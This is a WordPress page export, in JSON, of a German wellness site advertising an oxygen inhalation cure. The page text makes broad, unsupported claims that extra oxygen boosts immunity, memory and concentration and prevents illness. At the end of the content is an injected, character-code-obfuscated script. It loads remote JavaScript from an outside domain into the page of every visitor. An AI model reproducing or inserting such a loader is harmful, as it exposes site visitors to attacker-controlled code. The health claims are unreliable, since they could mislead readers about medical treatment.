{"id":185,"date":"2016-01-29T21:10:57","date_gmt":"2016-01-29T21:10:57","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=185"},"modified":"2016-03-06T20:13:59","modified_gmt":"2016-03-06T20:13:59","slug":"sauerstoffkur","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=185","title":{"rendered":"Sauerstoffinhalation"},"content":{"rendered":"<p><strong><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_006_web_o.jpg\" rel=\"attachment wp-att-607\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-607 aligncenter\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_006_web_o-300x225.jpg\" alt=\"Michael_Kriens_006_web_o\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_006_web_o-300x225.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_006_web_o.jpg 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> \u00a0 \u00a0 <\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p><strong>FLIQUA\u00a0 Sauerstoffinhalation <\/strong>nach Manfred v. Ardenne.<\/p>\n<p>Warum ist Sauerstoff f\u00fcr uns so wichtig?\u00a0 <strong>Sauerstoff gilt als Lebenselixier, denn Sauerstoff ist Voraussetzung f\u00fcr Energie.<\/strong> <strong>\u00a0<\/strong><\/p>\n<p>Energie wird f\u00fcr alle Lebensvorg\u00e4nge in unserem K\u00f6rper ben\u00f6tigt. So wird auch verst\u00e4ndlich, dass Gesundheit, Leistungsf\u00e4higkeit und Wohlbefinden an ein optimales Energiepotential gebunden sind. Unser K\u00f6rper kann N\u00e4hrstoffe unter Mitwirkung von Vitalstoffen (Vitamine, Mineralstoffe, Spurenelemente) nur dann in Energie umsetzen, wenn gen\u00fcgend Sauerstoff vorhanden ist. Da wir Sauerstoff nicht speichern k\u00f6nnen, sind wir lebenslang auf eine st\u00e4ndige Zufuhr angewiesen. Dies geschieht durch die Atmung, die den Sauerstoff, der sich in der Umgebungsluft befindet, in die Lunge transportiert. Mit zunehmendem Alter wird unser K\u00f6rper oft nicht mehr optimal mit Sauerstoff versorgt, weil schon nat\u00fcrlicherweise die Leistungsf\u00e4higkeit von Lunge und Herz abnimmt.<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_005_web_o.jpg\" rel=\"attachment wp-att-606\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-606 aligncenter\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_005_web_o-300x225.jpg\" alt=\"Michael_Kriens_005_web_o\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_005_web_o-300x225.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Michael_Kriens_005_web_o.jpg 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p>Sauerstoffdefizite sind nicht nur Ursache verschiedener Erkrankungen, sondern k\u00f6nnen auch bei Leistungsabfall, Konzentrationsschw\u00e4che, geistiger und k\u00f6rperlicher Ersch\u00f6pfung eine Rolle spielen. Auch kann die Anf\u00e4lligkeit f\u00fcr Krankheiten und Infektionen zunehmen. Stress, Umweltschadstoffe, \u00dcbergewicht und Bewegungsmangel k\u00f6nnen das Sauerstoffpotential zus\u00e4tzlich beeinflussen. <strong>Fehlt Sauerstoff \u2013 fehlt Energie!<\/strong> <strong>\u00a0<\/strong>Ob wir gen\u00fcgend Sauerstoff aufnehmen, kann mit Hilfe des leicht messbaren Sauerstoff \u2013 Partialdrucks beurteilt werden. Mit zunehmendem Alter nimmt der Sauerstoff \u2013 Partialdruck ab. Niedrige Messwerte signalisieren, dass die Sauerstoff \u2013 Aufnahme des K\u00f6rpers und damit die Energiebereitstellung nicht optimal gew\u00e4hrleistet werden kann. <strong>Aber: <\/strong>Ein <strong>\u201eP<\/strong><strong>LUS<\/strong><strong>\u201c <\/strong>an Sauerstoff kann die nat\u00fcrlichen Abwehrkr\u00e4fte st\u00e4rken und damit steigert es deutlich das Wohlbefinden und die Leistungsf\u00e4higkeit.<\/p>\n<p><!--more--><\/p>\n<p><a href=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920.jpg\" rel=\"attachment wp-att-261\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-261 aligncenter\" src=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920-300x225.jpg\" alt=\"air-bubbles-230014_1920\" width=\"371\" height=\"278\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920-300x225.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920-768x576.jpg 768w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920-1024x768.jpg 1024w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/air-bubbles-230014_1920.jpg 1920w\" sizes=\"auto, (max-width: 371px) 100vw, 371px\" \/><\/a><\/p>\n<p>Jeder k\u00f6nnte von der Wirkung einer Sauerstoffkur profitieren:<\/p>\n<ul>\n<li>Erh\u00f6hung der Merkf\u00e4higkeit und Steigerung der Konzentrationsf\u00e4higkeit.<\/li>\n<\/ul>\n<ul>\n<li>Verbesserung der Kondition vor gro\u00dfen Belastungen in Beruf, Familie oder Sport.<\/li>\n<\/ul>\n<p>Vorsorge im Hinblick auf gesundheitliche Irritationen, deren Ursachen Sauerstoffmangel ist.<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 \u00a0 &nbsp;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-185","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/185","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=185"}],"version-history":[{"count":20,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/185\/revisions"}],"predecessor-version":[{"id":613,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/185\/revisions\/613"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=185"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}